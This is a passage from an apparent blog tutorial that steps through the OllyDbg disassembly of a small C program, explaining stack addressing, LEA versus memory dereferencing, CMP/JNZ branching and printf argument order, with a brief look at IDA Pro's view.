You can see here that the compiler has decided that our if-test is not necessary, and instead of performing a compare on 2==2, it opts to just always execute the call to printf with “Hello World” and then puts in a JMP command to always skip over the “No Greeting for you” section. This is a very small, trivial example of the kinds of unexpected things that you’ll find in disassembled code. Very likely no programmer would compare two constants like we have, but you can see that the program has been optimised in a way that may not immediately make sense if we don’t have the source code handy.
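Put side by side in C, the difference between what we wrote and what the compiler effectively produced looks something like this. Both function names are invented for the comparison; this is a sketch of the behaviour, not output from any tool.

```c
/* The if-test as written in the source: both sides are constants */
const char *greeting_as_written(void)
{
    if (2 == 2)
        return "Hello World";
    else
        return "No Greeting for you";
}

/* What the compiled code effectively does: the test is gone */
const char *greeting_as_compiled(void)
{
    return "Hello World";
}
```

Note that in the listing above the “No Greeting for you” code is still present in the binary; it is simply jumped over every time, so the two functions always give the same answer.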

004012F5   > 68 D9B04000    PUSH hello2.0040B0D9                     ; /format = "enter a number"
004012FA   . E8 5A760000    CALL hello2._printf                      ; \_printf
004012FF   . 83C4 04        ADD ESP,4
00401302   . 8D7D FC        LEA EDI,DWORD PTR SS:[EBP-4]
00401305   . 57             PUSH EDI
00401306   . 68 D6B04000    PUSH hello2.0040B0D6                     ; /format = "%d"
0040130B   . E8 70430000    CALL hello2._scanf                       ; \_scanf
00401310   . 83C4 08        ADD ESP,8
00401313   . 837D FC 02     CMP DWORD PTR SS:[EBP-4],2

This section takes a number entered by the user and compares it.  It’s worth it at this point to set a breakpoint at 004012F5 and step through the program paying close attention to the registers and the stack.

The LEA command computes the address EBP-4 (the address itself, not the value stored there) and places it in EDI; the following PUSH command then places that address at the top of the stack.

You’ll notice the number you enter is placed on the stack at 0012FF6C. Yours may be different, but it will always be at the address EBP-4; here EBP holds 0012FF70, so in hex 0012FF70 – 4 = 0012FF6C.

The stack now looks like this

0012FF60   0040B0D6  Ö°@.  ASCII "%d"
0012FF64   0012FF6C  lÿ.
0012FF68   7C910208  ‘|  ntdll.7C910208
0012FF6C   00000002  ...
0012FF70  /0012FFC0  Àÿ.

Olly moves the view of the stack according to what is in the ESP register (which was just incremented by 8 in the previous code). You can scroll up and right-click -> lock stack in order to stop it from moving while debugging.

The memory address 0012FF64 now stores the value of the address that contains the number that we just entered. Something that is important to note at the moment is the difference between a reference to the data stored in a register and a reference to the data stored at the memory address that the register holds. They are very different.

For example, having stepped through the code to the CMP statement, we would have seen that the ADD ESP,8 command immediately added 8 to the value stored in the ESP register. The CMP command, however, is not referring to the data stored in EBP, nor is it referring to (the value of the data stored in EBP)-4, but it is referencing the data stored at the memory address in the stack that equals the value of (EBP minus 4). Confusing?

If the data stored in EBP is “0012FF70”, then any reference to EBP without square brackets refers to the value 0012FF70.
If the data stored in the memory address 0012FF70 is “0012FFC0”, then a reference to [EBP] with the square brackets is referring to the value “0012FFC0”.
A reference to [EBP-4] first takes the number 4 away from the value stored in EBP, and then finds the value stored at the resultant memory address. In this case EBP contains the hex value “0012FF70” and so EBP-4 = “0012FF6C”. If the data stored at the 0012FF6C stack address is “2”, then a reference to [EBP-4] = “2”.

I hope this is clear because it is a very important concept, and one that may not be clear to people who have only programmed in higher level languages (like myself I’m ashamed to admit).  Once again, I recommend that you step through this in Ollydbg paying close attention to the registers and the stack.
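If you are more at home in C, the same distinction can be sketched with pointers. The function names below are made up for this illustration, and a uint32_t pointer stands in for the EBP register; because it points at 4-byte slots, "ebp - 1" in C corresponds to "EBP-4" in the listing.

```c
#include <stdint.h>

/* LEA EDI,[EBP-4]: computes the address only, nothing is read from memory */
uint32_t *lea_ebp_minus_4(uint32_t *ebp)
{
    return ebp - 1;   /* one 4-byte slot below EBP */
}

/* CMP/PUSH DWORD PTR [EBP-4]: reads the value stored at that address */
uint32_t load_ebp_minus_4(uint32_t *ebp)
{
    return *(ebp - 1);
}

/* [EBP]: reads the value stored at the address held in EBP */
uint32_t load_ebp(uint32_t *ebp)
{
    return *ebp;
}
```

To try it, build a two-slot array holding 2 and 0x0012FFC0, and point ebp at the second slot. load_ebp_minus_4 then gives back 2, load_ebp gives 0x0012FFC0, and lea_ebp_minus_4 gives the address of the first slot without touching its contents.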

Moving right along then, the rest of the code is as follows:

00401317   . 75 0F          JNZ SHORT hello2.00401328
00401319   . 68 CAB04000    PUSH hello2.0040B0CA                     ; /format = "number = 2"
0040131E   . E8 36760000    CALL hello2._printf                      ; \_printf
00401323   . 83C4 04        ADD ESP,4
00401326   . EB 0D          JMP SHORT hello2.00401335
00401328   > 68 BDB04000    PUSH hello2.0040B0BD                     ; /format = "number <> 2"
0040132D   . E8 27760000    CALL hello2._printf                      ; \_printf
00401332   . 83C4 04        ADD ESP,4

Here you see the basics of an if-test at work. As we know, the previous command (CMP DWORD PTR SS:[EBP-4],2) effectively performed the operation [EBP-4]-2, and instead of storing the result, it set the status flags (ZF and CF among them) according to the outcome. All we care about for this one is whether the difference is zero (ZF flag set to 1). If it is, the program will carry on with the next command; if it is not zero, it will jump (JNZ = Jump if Not Zero) by setting the next execution address (stored in the EIP register) to 00401328 and then continue on from there.

If we enter 2 into the program, the result of the comparison will be zero and the program will proceed to tell us that the “number = 2”. After it has finished doing this, it jumps past the alternate branch to the next command after it (the PUSH at 00401335). If it takes the “number <> 2” path, then once it has finished, it just continues with the next command.
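The compare-then-jump pair can be modelled in a few lines of C. This is only a toy model under my own naming (struct flags, model_cmp and eip_after_jnz are not real APIs), and it tracks just the two flags mentioned above; the addresses are the ones from the listing.

```c
#include <stdint.h>

struct flags {
    int zf;  /* zero flag: 1 when the operands are equal */
    int cf;  /* carry flag: 1 when the unsigned subtraction borrows */
};

/* Models CMP a,b: works out a-b but keeps only the flags */
struct flags model_cmp(uint32_t a, uint32_t b)
{
    struct flags f;
    f.zf = (a == b);
    f.cf = (a < b);
    return f;
}

/* Models the JNZ at 00401317: returns the address executed next */
uint32_t eip_after_jnz(struct flags f)
{
    if (f.zf == 0)
        return 0x00401328u;  /* jump taken: "number <> 2" branch */
    return 0x00401319u;      /* fall through: "number = 2" branch */
}
```

Feeding it model_cmp(2, 2) sets zf and falls through to 00401319, while any other number clears zf and lands on 00401328.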

If you are following closely at this point, you will notice that there are some unnecessary redundancies in this code. There is a duplicated “ADD ESP,4”; only one is ever executed due to the if-test, so why not remove one and place the other at the end of the if-test? You’ll also notice that by the time we reach the next section, the EDI register already contains the address EBP-4 (loaded by the first LEA), and so the second LEA command is unnecessary. There are certain strange people in this world who actually care about this sort of thing, and they even have competitions to try to reduce the size of executables as much as possible by removing redundancies like this and being as efficient as possible. For the moment, it’s just an interesting point to note: compilers are not absolutely perfect.

Next, we get to our final section of the code.

00401335   > FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; /<%d>
00401338   . 8D7D FC        LEA EDI,DWORD PTR SS:[EBP-4]             ; |
0040133B   . 57             PUSH EDI                                 ; |<%d>
0040133C   . 68 A0B04000    PUSH hello2.0040B0A0                     ; |format = "The address of number is: %d and the value is %d"
00401341   . E8 17760000    CALL hello2._printf                      ; \_printf
00401346   . 83C4 0C        ADD ESP,0C
00401349   . B8 00000000    MOV EAX,0
0040134E   . 5F             POP EDI
0040134F   . C9             LEAVE
00401350   . C3             RETN

I just added this section of the code to ram home the difference between data stored in registers and the value stored at the memory location that a register points to.

The first line here is fairly simple – it gets the value that we entered and puts it at the top of the stack, preparing it for being displayed to the user. The second line computes the address EBP-4 (where that value lives) and puts it into the EDI register. The following line pushes it onto the stack and we’re ready to go.

If you take it one step further, the stack looks like this:

0012FF5C   0040B0A0  |format = "The address of number is: %d and the value is %d"
0012FF60   0012FF6C  |<%d> = 12FF6C (1245036.)
0012FF64   00000002  \<%d> = 2

You’ll notice that the numeral 2 was placed on the stack first, followed by the memory address, despite the fact that the address is displayed first in the output string. You can step into the CALL hello2._printf command (by hitting F7 in Olly) to see what happens with these values.
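The push order is easier to see with a toy stack. The sketch below is purely illustrative: struct toy_stack and its helpers are invented names, the stack is just a small array that grows downwards, and there is no overflow checking since only three values are pushed.

```c
#include <stdint.h>

#define STACK_SLOTS 8

/* Hypothetical toy stack: grows downwards, like the real one */
struct toy_stack {
    uint32_t slot[STACK_SLOTS];
    int top;   /* index of the most recently pushed slot */
};

void toy_init(struct toy_stack *s)
{
    s->top = STACK_SLOTS;     /* empty: "ESP" sits just past the last slot */
}

void toy_push(struct toy_stack *s, uint32_t value)
{
    s->top -= 1;              /* ESP moves down first */
    s->slot[s->top] = value;  /* then the value is stored */
}

/* Pushes printf's arguments right to left, as in the listing */
void push_printf_args(struct toy_stack *s, uint32_t fmt,
                      uint32_t addr, uint32_t num)
{
    toy_push(s, num);   /* PUSH DWORD PTR SS:[EBP-4] */
    toy_push(s, addr);  /* LEA EDI,[EBP-4] then PUSH EDI */
    toy_push(s, fmt);   /* PUSH hello2.0040B0A0 */
}
```

After pushing 0x0040B0A0, 0x0012FF6C and 2 this way, the format string pointer ends up at the top, the address next and the 2 last, which matches the stack view above: the last argument is pushed first so that the first argument ends up closest to the top.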

You’ll notice that the program, when it completes its execution, will output “The address of number is: 1245036”. If you convert this to hex, you’ll get 12FF6C, which is the memory address where our entered number is stored.
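If you don’t have a hex calculator handy, the decimal value from the stack view (1245036) can be converted with a couple of lines of C. The helper name to_hex is my own; it is just a thin wrapper around snprintf.

```c
#include <stdio.h>

/* Writes value as uppercase hex into buf; returns the number of characters
   snprintf reports (excluding the terminating NUL). */
int to_hex(unsigned long value, char *buf, size_t size)
{
    return snprintf(buf, size, "%lX", value);
}
```

Passing 1245036 with a 16-byte buffer leaves the string 12FF6C in it. As an aside, the standard way to print an address directly is the %p conversion, which saves doing this step by hand.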

So there’s only one more thing remaining here. We’ve seen what Olly does with the code, so let’s have a quick peek at what IDA Pro has to offer:

As you can see, IDA puts together a nice graphical program flow, and it is very easy to see where in the code the various jumps go to. You’ll also notice that it appears to use a different method of disassembly, or at least it displays the disassembled code in a different manner than Olly does.

These two lines in Olly:
00401335   > FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; /<%d>
00401338   . 8D7D FC        LEA EDI,DWORD PTR SS:[EBP-4]             ; |

are somewhat simplified in IDA as:

push [ebp+var_4]
lea  edi, [ebp+var_4]

with var_4 being declared at the start of the function as a constant (equal to -4).

I hope this has been helpful. Please feel free to leave a comment, and if I’ve made any mistakes in the above, please let me know. I’m always trying to learn more :-)

Next time we’ll do the same thing again looking at array structures.

Cheers!
Nick.
